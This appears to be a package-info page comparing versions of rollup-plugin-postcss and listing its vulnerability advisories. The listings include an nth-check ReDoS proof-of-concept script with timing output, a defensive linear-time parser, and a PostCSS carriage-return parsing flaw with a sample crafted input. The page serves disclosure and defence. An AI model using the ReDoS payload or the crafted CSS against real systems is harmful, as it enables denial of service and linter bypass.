Rollup Plugin PostCSS integrates PostCSS into Rollup workflows, letting developers process CSS files with the PostCSS plugin ecosystem. Between versions 2.1.1 and 2.0.6 the core functionality is the same: both provide a robust way to manage CSS transformations, both support popular PostCSS plugins such as cssnano for minification and autoprefixer for vendor prefixing, and both carry the key dependencies postcss, postcss-load-config, and postcss-modules, so they are compatible with a wide range of PostCSS configurations and with CSS Modules.
The notable difference lies in the dist object. Version 2.1.1 has a slightly larger unpacked size of 35750 bytes compared to 2.0.6's 35697, suggesting minor code refinements that do not significantly change the plugin's structure or features. Most developers would find both versions equally suitable. Version 2.1.1 was released on February 22, 2020, a more recent update than version 2.0.6, released on February 3, 2020. Choosing the newer version is generally recommended for stability and for any underlying bug fixes or performance improvements. Whichever version is used, the plugin streamlines a CSS pipeline by running PostCSS processing directly inside the Rollup build.
All vulnerabilities related to version 2.1.1 of the package
Inefficient Regular Expression Complexity in nth-check
There is a Regular Expression Denial of Service (ReDoS) vulnerability in nth-check that causes a denial of service when parsing crafted, invalid CSS nth expressions.
The ReDoS weakness in the regex is mainly due to the sub-pattern \s*(?:([+-]?)\s*(\d+))? in which two quantified whitespace sub-expressions (\s*) are adjacent, separated only by an optional sign, so a run of whitespace can be split between them in many overlapping ways and the matcher backtracks through all of them on invalid input. It can be triggered with the following code.
Proof of Concept
// PoC.js
var nthCheck = require("nth-check")
for (var i = 1; i <= 50000; i++) {
    var time = Date.now();
    // "2n" followed by a long run of spaces and a trailing invalid character
    var attack_str = '2n' + ' '.repeat(i * 10000) + "!";
    try {
        nthCheck.parse(attack_str)
    }
    catch (err) {
        // parse() rejects the input, but only after backtracking through the whitespace
        var time_cost = Date.now() - time;
        console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms")
    }
}
The Output
attack_str.length: 10003: 174 ms
attack_str.length: 20003: 1427 ms
attack_str.length: 30003: 2602 ms
attack_str.length: 40003: 4378 ms
attack_str.length: 50003: 7473 ms
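The defensive counterpart to the pattern above, as an added example that is not code from the advisory or from the nth-check project: a single-pass parser for the an+b argument of :nth-* selectors that uses no backtracking regex and bounds the input length up front, so a whitespace run costs one linear scan instead of exponential backtracking. MAX_NTH_LENGTH is an assumed bound, and requiring an explicit sign before b is a deliberate choice that is stricter than nth-check.

```javascript
// Added example, not from the advisory or nth-check: hand-written an+b parser.
// Returns [a, b] for "an+b", "odd", "even" or a plain integer; throws otherwise.
const MAX_NTH_LENGTH = 64; // assumed bound: real selectors are far shorter

function parseNth(raw) {
  if (typeof raw !== "string") throw new TypeError("nth argument must be a string");
  // Reject over-long input in O(1) before any parsing happens.
  if (raw.length > MAX_NTH_LENGTH) {
    throw new RangeError(`nth argument too long (${raw.length} > ${MAX_NTH_LENGTH})`);
  }
  const s = raw.trim().toLowerCase();
  if (s === "odd") return [2, 1];
  if (s === "even") return [2, 0];

  let i = 0; // single cursor; every helper only ever moves it forward
  const isSpace = (c) => c === " " || c === "\t" || c === "\n" || c === "\r" || c === "\f";
  const skipSpace = () => { while (i < s.length && isSpace(s[i])) i++; };
  const readSign = () => (s[i] === "+" || s[i] === "-") ? s[i++] : "";
  const readDigits = () => {
    const start = i;
    while (i < s.length && s[i] >= "0" && s[i] <= "9") i++;
    return s.slice(start, i);
  };
  const fail = () => { throw new SyntaxError(`invalid nth argument: ${JSON.stringify(raw)}`); };

  const sign1 = readSign();
  const digits1 = readDigits();
  if (s[i] !== "n") {
    // Plain integer b (e.g. "5", "-3"): a is 0.
    if (digits1 === "" || i !== s.length) fail();
    return [0, Number(sign1 + digits1)];
  }
  i++; // consume 'n'; a missing coefficient means a = 1 (or -1 for "-n")
  const a = Number(sign1 + (digits1 === "" ? "1" : digits1));
  skipSpace();
  if (i === s.length) return [a, 0];
  // Stricter than nth-check: an explicit sign is required before b.
  const sign2 = readSign();
  if (sign2 === "") fail();
  skipSpace();
  const digits2 = readDigits();
  if (digits2 === "" || i !== s.length) fail();
  return [a, Number(sign2 + digits2)];
}
```

Feeding this parser the advisory's attack string fails immediately on the length check; a shorter variant that passes the bound is rejected after one scan of the spaces.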
PostCSS line return parsing error
An issue was discovered in PostCSS before 8.4.31. It affects linters using PostCSS to parse external Cascading Style Sheets (CSS). There may be \r (carriage return) discrepancies, as demonstrated by @font-face{ font:(\r/*);} in a rule.
This vulnerability affects linters using PostCSS to parse external, untrusted CSS. An attacker can prepare CSS so that it contains parts that PostCSS parses as a CSS comment. After processing by PostCSS, those parts are included in the PostCSS output as CSS nodes (rules, properties) despite originally sitting inside a comment.